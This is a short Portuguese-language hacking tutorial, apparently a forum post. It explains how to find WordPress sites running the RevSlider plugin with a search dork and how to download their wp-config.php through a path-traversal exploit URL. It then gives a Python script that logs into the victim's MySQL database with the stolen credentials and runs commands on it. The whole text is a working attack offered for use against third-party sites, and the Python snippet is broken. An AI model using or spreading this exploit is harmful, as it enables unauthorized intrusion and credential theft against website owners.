Dork: revslider.php "index of" (existem outras, porém não lembro mais rs)
Exploit: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Depois de vcs encontrarem o alvo, vão substituir uma parte da URL pelo exploit e automaticamento irá fazer o download
exemplo: site.com.br/wp-content/plugins/revslider/ (NORMAL)
site.com.br/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php (EXPLOIT)


Conectando com Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import MySQLdb
import sys
target = raw_input("HOST: ")
usuario = raw_input("Usuário: ")
senha = raw_input("Senha: ")
#dbname = raw_input("DBName: ") Descomente a linha se quiser definir um banco de dados especifico (em alguns casos é necessario)
#tentando criar uma conexão
try:
MySQLdb.connect(host=target, user=usuario, passwd=senha)
cur = db.cursor()
#executando comandos dentro do servidor
cur.execute(" Digite o comando aqui")
#mostra o resultado do comando
for resultado in cur:
print(resultado)
except Exception as error:
print("Ocorreu algum erro: ", error)